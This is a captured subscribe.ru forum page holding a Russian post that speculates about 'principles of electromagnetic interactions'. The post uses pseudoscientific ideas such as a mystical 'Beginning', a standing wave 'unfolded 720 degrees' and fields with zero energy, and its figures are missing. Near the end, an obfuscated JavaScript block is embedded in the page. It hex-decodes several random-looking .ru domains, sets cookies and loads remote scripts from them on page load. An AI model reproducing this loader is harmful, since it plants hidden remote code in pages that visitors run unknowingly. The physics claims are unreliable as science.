Отправляет email-рассылки с помощью сервиса Sendsay
Премодерируемое участие
3196 участников
←  Предыдущая тема Все темы Следующая тема →
пишет:

Основные принципы ЭМ взаимдействий

 

В начале предлагаю Вам просмотреть:  

 

Чтобы вникнуть в сущность структуры электромагнитных излучений во всех его проявлениях это, прежде всего во взаимодействии между собой, нам необходимо определится в его основных принципах взаимодействия.

В первую очередь в тех принципах, без которых мы не имеем возможности рассматривать эти взаимодействия, это: 

· непрерывность; 

· одновременность; 

· бесконечность; 

принципы, которые надо рассматривать вместе как Целое в соотношении между собой. 

Для наглядности в этом аспекте, рассмотрим шкалу электромагнитных излучений. Мысленно эту шкалу поместим в условный треугольник, где длины волн излучений развиваются по возрастающему. (рис.2.1)

 

 

 

Рис.2.1. Шкала электромагнитных излучений.

  

В непрерывности эту шкалу можно представить в виде (рис.2.2)

 

 

 

 

 

 

 

Рис.2.2. Шкала электромагнитных излучений в непрерывности. 

 

где каждый вид излучения имеет начало в конце одного излучения и конец в начале другого. Значит можно утверждать, что каждый вид излучения имеет начало и конец в бесконечности и одновременности, которые можно рассматривать по отдельности.

 Следуя этому утверждению, мы можем взять из этой шкалы одно излучение, например рентгеновское излучение и рассмотреть отдельно. Для этого это излучение от точечного источника А поместим в виртуально дискретное пространство по направлению вектора скорости распространения излучения (v) в точках (а, в, с, d и т.д.) в непрерывности, бесконечности и одновременности. (рис.2. 3)

 

  

Рис.2.3. Оптическое излучение по вектору скорости распространения. 

 

Поскольку каждую точку на оси по направлению вектора скорости распространения оптического излучения можем рассматривать как самостоятельный источник излучения (принцип Гюйгенса) и учитывая что это условие выполняется по всему фронту излучения то можно предположить что оптическое излучение распространяется по собственному полю в любой точке дискретного пространства-времени. При этом особо необходимо отметить, что дискретность пространства-времени обособлено в движении. Продолжая далее и учитывая, что это условие (принцип Гюйгенса) одновременно выполняется для всех видов излучений, то также можно предположить, что любая точка дискретного пространства-времени имеет все виды полей одновременно, в бесконечности и непрерывности. 

Если поля всех видов излучений поместить в пространство и мысленно совместить начало каждого поля излучения на прямой ОА представив в одной точке А, то как мы обратим внимание, получим что все поля в любой точке пространства должны иметь свое начало (рис.2. 4).

 

 

 

 

Рис.2.4. Шкала электромагнитных излучений в одной точке по лучу. 

 

Не просто начало, а Начало, которое является причиной и следствием существования их самих этих полей.

Начало, которое имеет определяющее значение в развитии структуры пространства-времени (о чем далее подробно остановимся отдельно). 

Это Начало, которое также должно удовлетворять всем трем основным принципам взаимодействия (бесконечность, непрерывность и одновременность), в тоже время иметь начало и конец через сами поля пространства-времени, т.е. иметь дискретное значение в движении. 

Начало которое также определяет дискретность Всего окружающего нас Бытия в соотношении. 

Начало, которое развивается и взаимодействует в любой точке пространства-времени по всем направлениям в бесконечности и в непрерывности. 

Начало, которое можно представить в виде стоячей волны, продольно-гармонических электромагнитных колебании, развернутых на 720 градусов до сферы, где колебания осуществляются в объемном виде. 

Начало, которое в любой точке пространства-времени, можно принять как Условно-виртуальное Начало. А сами поля пространства-времени существуют и развиваются одни поля через другие, и взаимодействуют через это Начало. 

 

 

 

 

 

Чтобы разобраться в этом самом существовании и развитии полей, возьмем отдельно одно условное поле пространства-времени и поместим на оси распространения электромагнитного излучения с Началом в точке О (рис.2.5).

 

 

 

Рис.2.5. Условное поле пространства-времени по оси распространения электромагнитных излучений.

 

Представляя точку О, Началом стоящей волны, где волны распространяются в противоположных направлениях, первоначально рассмотрим это поле когда волны Начала имеют направление скорости распространения от точкиО.

Как заметим, мы получили ячейку луча поля, развернув которую через луч излучения на 180 градусов по плоскости листа получим диск поля пространства-времени. Развернув эту плоскость через точку О, по фронту излучения еще на 180 градусов получим сферу поля с множеством плоскостей и лучей условного поля пространства-времени имеющих различные состояния динамики. Причем если эта развертка происходит в промежутках временных интервалов, то в объеме и на поверхности этой сферы одновременно все точки будут иметь разные значения поляризации. Эту сферу условно можно принять за магнитное состояние этого условного поля пространства-времени.

Проделав такую же развертку, но при обратном направлении скорости распространения на точку О (рис.2. 6),

 

 

 

 

 

Рис.2.6. Условное поле пространства-времени по оси распространения электромагнитных излучений.

 

получим такую же сферу поля, но с противоположными по направлению состояниями, которую так же можно принять за электрическое состояние этого условного поля пространства-времени.

Совместив эти два состояния этого условного поля, получим модель ячейки условного поля пространства-времени, где все плоскости электрических и магнитных состоянии проходящие через точку О в любом направлении находятся во взаимно перпендикулярном и равновесном состоянии и энергии не несут т.е. сумма энергии электрических и магнитных состоянии равна нулю.

 

window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="19281",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "subscribe.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

Это интересно
0

27.11.2015 , обновлено  27.11.2015
Пожаловаться Просмотров: 764  
←  Предыдущая тема Все темы Следующая тема →


Комментарии временно отключены